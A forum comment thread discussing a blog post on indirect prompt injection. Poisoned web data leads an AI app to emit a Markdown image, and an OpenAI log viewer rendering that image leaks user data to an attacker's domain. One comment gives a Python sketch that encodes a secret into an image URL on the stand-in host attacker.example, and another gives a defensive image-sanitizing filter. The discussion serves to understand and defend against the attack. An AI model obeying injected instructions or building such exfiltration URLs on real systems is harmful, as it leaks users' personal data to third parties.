by numlocked 149 days ago
At the risk of totally misunderstanding this...it seems to be exfiltration by the app developer, who already has access to all of these data sources and the data that the customer is inputting into the AI KYC app (in this example)...right? I don't believe this exposes any end-user information to a third party. The AI app developer is already 'trusted' and could get access to this information regardless of the exfiltration. Maybe someone can explain this to me more clearly.

The attacker isn't the dev -- the attacker is a third party that poisoned the online data that is ingested by the AI tool.

- Dev builds secure AI app
- App defends against indirect prompt injection in data from the internet
- Dev reviews the flagged log
- Log affected by the injection is rendered, and the attacker who wrote the injection in the web data exfiltrates the data from the AI app user

Agreed. The writeup could use a little Alice, Bob and Charlie treatment to make that more clear though.

The OSINT data seems to be the most likely source of the poisoned content. I guess you could bury that in a social media profile?

The situation this applies to is when input from the attacker is fed to an LLM, but the response from that LLM is not returned to the attacker.

If an attacker tries a prompt injection, they are unable to see the LLM's response. To complete the attack they need to find an alternate way to have information sent back to them. For example, if the LLM had access to a tool to send an SMS message, the prompt injection could tell it to message the attacker, or maybe it has a tool to post on X, which the attacker could then see. In this blog post, the information gets back to the attacker when someone views the poisoned entry in the OpenAI log viewer, which causes their browser to load a URL.
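To make the "load a URL" channel concrete, here is a rough Python sketch of how data can ride along in a Markdown image URL. Everything in it is made up for illustration: the host `attacker.example`, the `d` parameter, and the sample value are assumptions, not details from the blog post.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

ATTACKER_HOST = "attacker.example"  # hypothetical attacker-controlled domain


def build_exfil_markdown(secret: str) -> str:
    """Markdown an injected prompt might coax the model into emitting.

    The sensitive value is URL-encoded into the image's query string.
    """
    query = urlencode({"d": secret})
    return f"![status](https://{ATTACKER_HOST}/pixel.png?{query})"


def what_attacker_logs(markdown: str) -> dict:
    """Simulate what the attacker's web server would see on an image fetch."""
    url = markdown[markdown.index("(") + 1 : markdown.rindex(")")]
    parts = urlsplit(url)
    return {"host": parts.netloc, "params": parse_qs(parts.query)}


if __name__ == "__main__":
    md = build_exfil_markdown("passport=X1234567")  # made-up sample value
    print(md)
    print(what_attacker_logs(md))
```

Nothing is sent until some viewer renders that Markdown as an image. At that point the viewer's browser makes the request, and the query string lands in the attacker's access log.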

The problem seems to be that OpenAI claims to protect against these problems. So yes, the app dev is malicious, yes, the user activated the app, but the platform (OpenAI) also claimed to protect the user from the app dev exfiltrating data. Seems like there was a chink in the armor there.

At least that is my initial reading from this.

No, OpenAI doesn't claim to protect users from anything; this is a case of an application exfiltrating data to OpenAI, which can then end up getting leaked back out to the attacker - that's not something that is up to OpenAI to prevent, that's up to the app developer.

It's the same as if your devs accidentally sent PII to Datadog - sure, Datadog could add some kind of filter to try to block it from being recorded, but it's not their fault that your devs or application sent them data. Same situation here: bad info is being sent to OpenAI, and OpenAI's otherwise benign log viewer is rendering Markdown, which could load an external image that has the bad data in its URL.

In that same situation, you'd expect Datadog to just not automatically render Markdown, but you wouldn't blame them for accepting PII that your developers willingly sent to them. Same for OpenAI, they could clean up the log console feature a bit to tighten things up but it's ultimately up to the developers to not feed secrets to a 3rd party.
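As a rough idea of what "not automatically render Markdown" could look like on the viewer side, here is a Python sketch that swaps inline images from non-allowlisted hosts for inert text before rendering. The allowlist, the function name, and the regex are my own assumptions, not anything OpenAI or Datadog actually does. The pattern only covers inline `![alt](url)` images, not reference-style images or raw HTML `<img>` tags.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the log viewer may load images from.
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Matches inline Markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def neutralize_remote_images(markdown: str) -> str:
    """Replace images from non-allowlisted hosts with plain placeholder text."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlsplit(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # leave trusted images untouched
        # Drop the URL entirely so the browser never issues a request for it.
        return f"[image blocked: {alt}]"

    return IMAGE_PATTERN.sub(replace, markdown)


if __name__ == "__main__":
    log_entry = "Result: ![x](https://attacker.example/p.png?d=secret) done"
    print(neutralize_remote_images(log_entry))
```

A more robust fix would live in the renderer itself, or in a Content-Security-Policy `img-src` restriction, rather than in a regex, but the idea is the same: untrusted log content should not be able to trigger outbound requests.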

it sounds like the data can be involuntarily disclosed to an external third party (the attacker’s domain) purely because someone reviewed logs that auto-load remote images

their log viewer renders the markdown and their browser will make a request containing the sensitive data to the attacker's domain, where it can be logged and viewed